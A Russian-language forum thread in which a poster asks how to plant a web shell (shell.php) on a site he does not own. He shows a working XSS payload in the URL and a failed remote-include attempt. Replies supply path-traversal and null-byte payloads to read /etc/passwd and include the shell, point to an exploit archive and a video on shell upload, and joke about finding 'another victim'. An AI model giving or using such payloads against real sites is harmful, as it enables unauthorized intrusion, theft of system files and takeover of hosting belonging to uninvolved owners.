Здравствуйте! Такая проблема. Сайт не фильтрует символы в адресной строке браузера. Что ты туда вводишь ( к примеру, тег изображения ), то этот тег станет картинкой в теле страницы. Вот в чем вопрос. Мне надо залить файл shell.php на тот хостинг, где стоит сайт!! Но как это сделать - не знаю! При чем, если в адр. строку браузера вписать index.php?idn=<img src=javascript:alert()>, то выскочит окно!! Хелп, плиз!!!
Не получается. Пишет Warning: main(categories/http://***.ru/shell.php.htm): failed to open stream: No such file or directory in /www/htdocs/index.php on line 440
NightRider Лучше дай ссылку на сайт посматреть, а то так не понятно что у тебя там, толи xss толи лок.инкдул... или вообще все вместе... Попробуй /../../../../../../../etc/passwd%00 дописать
http://www.yandex.ru/yandsearch?rpt=rad&text=%EA%E0%EA+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%F2%FC+%EB%EE%EA%E0%EB%FC%ED%FB%E9+%E8%ED%EA%EB%F3%E4
баян, я имею введу тот "инклуд" каторый есть на сайте о катором говорить автор... P.S: Видео по локальному инклуду, и заливки шелла: http://urussu.org/video/local_php_including.rar
разве не видно, инклудится только то, что в папке categories/, да и в конец добавляется .htm, попробуй shell.php%00
и че ему это даст? инклудятся только локальные файлы. автор ,забей на этот сайт и найди себе другую жертву )
С локального инклуда за 5 минут а то и меньше получается шелл.Ищите на милворме сплоиты типа Local File Include и смотрите
Если судить по (categories/http://***.ru/shell.php.htm), то он, помойму прикрепляет только html файлы
